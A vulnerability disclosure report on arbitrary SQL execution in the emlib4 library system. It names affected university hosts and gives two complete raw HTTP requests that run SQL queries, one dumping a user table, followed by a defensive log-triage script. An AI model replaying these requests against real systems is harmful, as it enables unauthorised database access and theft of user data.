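2015-04-07: Details reported to the vendor; awaiting vendor handling
2015-04-10: Vendor confirmed; details disclosed to the vendor only
2015-04-13: Details opened to third-party security partners
2015-06-04: Details disclosed to core white hats and experts in related fields
2015-06-14: Details disclosed to regular white hats
2015-06-24: Details disclosed to intern white hats
2015-07-09: Details disclosed to the public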
Following up on the previous report, several more pages were found to allow execution of arbitrary SQL statements.
Many schools are affected. Official site:
http://www.cxstar.cn/ (畅想之星)
There are two arbitrary SQL statement execution vulnerabilities:
1. POST /emlib4/system/datasource/selectrecordset.aspx
2. POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
I couldn't be bothered to look for new cases, so I'm just reusing the ones from last time:
http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx
http://202.112.181.252/emlib4/format/release/aspx/eml_homepage.aspx
http://202.202.12.32/emlib4/format/release/aspx/eml_homepage.aspx
http://202.120.143.35/emlib4/format/release/aspx/eml_homepage.aspx
http://media.lib.sjtu.edu.cn/emlib4/format/release/aspx/eml_homepage.aspx
Testing against Tsinghua University's instance:
http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx
First location:

POST /emlib4/system/datasource/selectrecordset.aspx HTTP/1.1
Host: 166.111.120.118
Proxy-Connection: keep-alive
Content-Length: 125
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.2
Origin: http://166.111.120.118
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Content-type: text/xml; charset=UTF-8
Referer: http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ovam5c45jbbivw45cgkokz3v; desktopID=; userID=; departmentID=; userName=; postIDs=; publicFlag=; regInterval=30

<Root><A3020>system</A3020><A3001>SELECT @@version</A3001><A3002 valueType="4">0</A3002><A3003 valueType="4">1</A3003></Root>

Second location:

POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined HTTP/1.1
Host: 166.111.120.118
Proxy-Connection: keep-alive
Content-Length: 142
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.2
Origin: http://166.111.120.118
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Content-type: text/xml; charset=UTF-8
Referer: http://166.111.120.118/emlib4/format/release/aspx/EML_INTENET_SY.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ovam5c45jbbivw45cgkokz3v; desktopID=; userID=; departmentID=; userName=; postIDs=; publicFlag=; regInterval=30

<Root><A3020>system</A3020><A3001>SELECT * from system_user_manage</A3001><A3002 valueType="4">0</A3002><A3003 valueType="4">15</A3003></Root>

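Severity: High
Vulnerability Rank: 12
Confirmed: 2015-04-10 17:32
CNVD did not directly reproduce the situation described; the report has been passed by CNCERT to Saier Education (赛尔教育), which will coordinate follow-up handling with the organizations operating the sites.
None yet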
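
For operators of affected installations, a log-triage sketch for the two endpoints above, added here as an example and not part of the original report or the vendor's code. It assumes you log request path, Cookie header and POST body; the allowlist entry, the function names and the reading of an empty userID cookie as "not logged in" are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Endpoints named in the report, lower-cased (IIS paths are case-insensitive).
WATCHED = {
    "/emlib4/system/datasource/selectrecordset.aspx",
    "/emlib4/system/datasource/getdatagridctrlresult.aspx",
}
# Constructed allowlist: statements the operator has recorded from the
# application's own pages (assumption; real entries must come from your logs).
KNOWN_STATEMENTS = {"select title, author from book_catalog where id = 1"}


def normalize(sql):
    """Collapse whitespace and case so trivial variations compare equal."""
    return re.sub(r"\s+", " ", sql).strip().lower()


def triage(path, cookie, body):
    """Classify one logged POST: returns 'ignored', 'ok' or an alert string."""
    if path.split("?", 1)[0].lower() not in WATCHED:
        return "ignored"
    lowered = body.lower()
    if "<!doctype" in lowered or "<!entity" in lowered:
        return "alert: DTD in request body"  # never feed entities to the parser
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "alert: malformed XML body"
    stmt = normalize(root.findtext("A3001") or "")
    if not stmt or stmt in KNOWN_STATEMENTS:
        return "ok"
    # Assumption: an empty userID cookie means no login, as in the report's requests.
    m = re.search(r"(?:^|;\s*)userID=([^;]*)", cookie)
    who = "user " + m.group(1) if m and m.group(1) else "unauthenticated"
    return "alert: unlisted statement from %s: %s" % (who, stmt)


if __name__ == "__main__":
    # Constructed log entries; the bodies reuse the element layout shown in the report.
    samples = [
        ("/emlib4/system/datasource/selectrecordset.aspx", "desktopID=; userID=; userName=",
         "<Root><A3020>system</A3020><A3001>SELECT @@version</A3001></Root>"),
        ("/emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined", "userID=42",
         "<Root><A3001>SELECT title, author FROM book_catalog WHERE id = 1</A3001></Root>"),
    ]
    for path, cookie, body in samples:
        print(triage(path, cookie, body))
```

Triage of this kind only surfaces abuse after the fact; the underlying problem is that the endpoints execute whatever statement the client places in A3001.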